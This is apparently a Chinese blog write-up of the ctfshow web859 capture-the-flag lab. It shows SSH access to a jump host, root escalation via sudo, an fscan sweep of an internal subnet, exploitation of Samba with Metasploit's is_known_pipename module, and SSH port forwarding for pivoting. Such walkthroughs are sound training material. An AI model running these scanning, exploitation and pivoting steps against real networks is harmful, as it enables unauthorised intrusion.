目录

  1. 1. 前言
  2. 2. 连接跳板机
  3. 3. fscan扫端口
  4. 4. msf getshell
  5. 5. 测试:内网代理
    1. 5.1. 单层代理

LOADING

第一次加载文章图片可能会花费较长时间

要不挂个梯子试试?(x

加载过慢请开启缓存 浏览器默认开启

ctfshow web859_有跳板机

2024/7/20 渗透 内网 ctfshow
字数统计: 456字   |   阅读时长: 2分   |   总文章阅读量:

前言

参考:

https://fushuling.com/index.php/2023/08/20/ctfshow%e5%88%b7%e9%a2%98%e8%ae%b0%e5%bd%95%e6%8c%81%e7%bb%ad%e6%9b%b4%e6%96%b0%e4%b8%ad/

https://www.cnblogs.com/thebeastofwar/p/17750376.html

连接跳板机

ssh连接上去,账密均为ctfshow

ssh ctfshow@pwn.challenge.ctf.show -p28246

登录上去之后尝试cd ~,发现缺少 /home/ctfshow 目录

发现能切成root权限

sudo -s

在/home目录下创建一个ctfshow目录给权限

mkdir /home/ctfshow
chmod 777 /home/ctfshow

fscan扫端口

接下来用ssh传一个fscan上去扫内网

scp -P 28246 fscan ctfshow@pwn.challenge.ctf.show:/home/ctfshow

image-20240720200128540

ifconfig查看内网网段

image-20240720203655783

然后fscan扫描172.2.235.4

chmod 777 fscan
./fscan -h 172.2.235.4/24

image-20240720203751766

start infoscan
(icmp) Target 172.2.235.4     is alive
(icmp) Target 172.2.235.1     is alive
(icmp) Target 172.2.235.5     is alive
(icmp) Target 172.2.235.6     is alive
(icmp) Target 172.2.235.7     is alive
(icmp) Target 172.2.235.2     is alive
(icmp) Target 172.2.235.3     is alive
[*] Icmp alive hosts len is: 7
172.2.235.6:139 open
172.2.235.4:22 open
172.2.235.5:80 open
172.2.235.6:445 open
172.2.235.5:9000 open

开了139和445端口

看一下这两个端口常有什么漏洞:

  • 139:samba服务
  • 445:smb相关服务

msf getshell

因为跳板机里已经有装了一些攻击工具,那么启动msf:

msfconsole

image-20240720202823525

测试了一下要用is_known_pipename

use exploit/linux/samba/is_known_pipename
set rhost 172.2.235.6
exploit

image-20240720204001343

flag在root下

测试:内网代理

这里的跳板机相当于我们已经获得了一台服务器的权限

单层代理

现在我们尝试将本地的8085端口转发到可控服务器内网中 172.2.235.5 的80端口(即内网的web服务)

然后就可以通过访问 127.0.0.1:8085 来访问 172.2.235.5:80

ssh -L 8085:172.2.235.5:80 ctfshow@pwn.challenge.ctf.show -p 28229

image-20240720204543400

image-20240720204602540